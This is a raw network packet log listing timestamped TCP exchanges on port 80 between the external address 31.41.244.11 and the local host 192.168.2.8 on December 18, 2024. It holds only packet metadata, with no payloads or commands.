Dec 18, 2024 13:38:34.395292044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.395342112 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.395479918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.395528078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.396356106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.396406889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.396536112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.396579027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.397818089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.397841930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.397872925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.397906065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.398669004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.398722887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.398821115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.398869991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.399561882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.399612904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.399765015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.399815083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.401316881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.401329041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.401371956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.401650906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.401705027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.401734114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.401781082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.402695894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.402745008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.402796030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.402846098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.403752089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.403842926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.403985977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.404038906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.404836893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.404957056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.404959917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.405010939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.405906916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.405961990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.406032085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.406080961 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.406946898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.407001019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.407012939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.407063007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.408073902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.408126116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.408139944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.408188105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.409131050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.409176111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.409202099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.409219980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.410259962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.410273075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.410319090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.411195993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.411248922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.411326885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.411381960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.412261963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.412316084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.412554026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.412606955 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.414272070 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.414285898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.414333105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.414489985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.414541006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.414690971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.414743900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.415719032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.415781021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.415781975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.415829897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.416620970 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.416640043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.416673899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.416701078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.417565107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.417612076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.417705059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.417754889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.418688059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.418741941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.418814898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.418889999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.419661045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.419720888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.556044102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.556138039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.556209087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.556263924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.556605101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.556659937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.556665897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.556720972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.557694912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.557760954 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.557764053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.557826042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.559194088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.559222937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.559254885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.559289932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.559751987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.559802055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.559870005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.559916973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.560823917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.560879946 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.560930014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.560981035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.561880112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.561956882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.561994076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.562043905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.563081026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.563138008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.563162088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.563211918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.564035892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.564090014 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.564107895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.564157963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.565107107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.565165997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.565272093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.565325022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.566417933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.566431046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.566507101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.566539049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.567466021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.567527056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.567589045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.567686081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.568522930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.568541050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.568581104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.568610907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.569395065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.569473028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.569474936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.569534063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.570631981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.570691109 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.570748091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.570810080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.571454048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.571510077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.571675062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.571724892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.572490931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.572560072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.572612047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.572669029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.573585987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.573657990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.573710918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.573766947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.575105906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.575119019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.575203896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.575726032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.575788975 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.575833082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.575894117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.576809883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.576864958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.576879025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.576960087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.577903032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.577963114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.578026056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.578074932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.578922987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.578974009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.579010963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.579066992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.579943895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.580024958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.580035925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.580087900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.580987930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.581057072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.581183910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.581234932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.582051039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.582119942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.582165956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.582214117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.583132029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.583197117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.583230019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.583287001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.584168911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.584228039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.584275961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.584322929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.585269928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.585326910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.585336924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.585386038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.586317062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.586390972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.586421013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.586436033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.587513924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.587564945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.587611914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.587667942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.588423014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.588479996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.588522911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.588574886 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.589615107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.589647055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.589673996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.589695930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.590528965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.590584993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.590713978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.590768099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.591653109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.591713905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.591736078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.591784954 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.592658043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.592710972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.592797041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.592845917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.593750000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.593820095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.593869925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.593924046 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.594815016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.594885111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.595046043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.595104933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.595843077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.595904112 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.595946074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.596003056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.596940994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.597002029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.597023964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.597069025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.597982883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.598042011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.598155975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.598211050 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.599052906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.599111080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.599137068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.599194050 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.600101948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.600171089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.600208044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.600260019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.601169109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.601227999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.601341009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.601391077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.602293968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.602358103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.602380991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.602437973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.603333950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.603377104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.603400946 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.603430986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.604408026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.604487896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.604515076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.604533911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.605434895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.605494022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.605561018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.605612993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.606540918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.606574059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.606604099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.606621981 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.607613087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.607673883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.607681990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.607724905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.608663082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.608716965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.608848095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.608901024 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.610141039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.610193968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.610203028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.610251904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.610861063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.610872984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.610917091 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.611749887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.611799002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.748327017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.748342991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.748409986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.748437881 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.748759031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.748811960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.748814106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.748861074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.749779940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.749850035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.749882936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.749934912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.750874996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.750930071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.750977993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.751035929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.751935959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.751990080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.752124071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.752166033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.753027916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.753061056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.753078938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.753101110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.754074097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.754127026 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.754179001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.754220009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.755131960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.755198956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.755276918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.755346060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.756218910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.756268978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.756294966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.756342888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.757319927 CET	80	49715	31.41.244.11	192.168.2.8
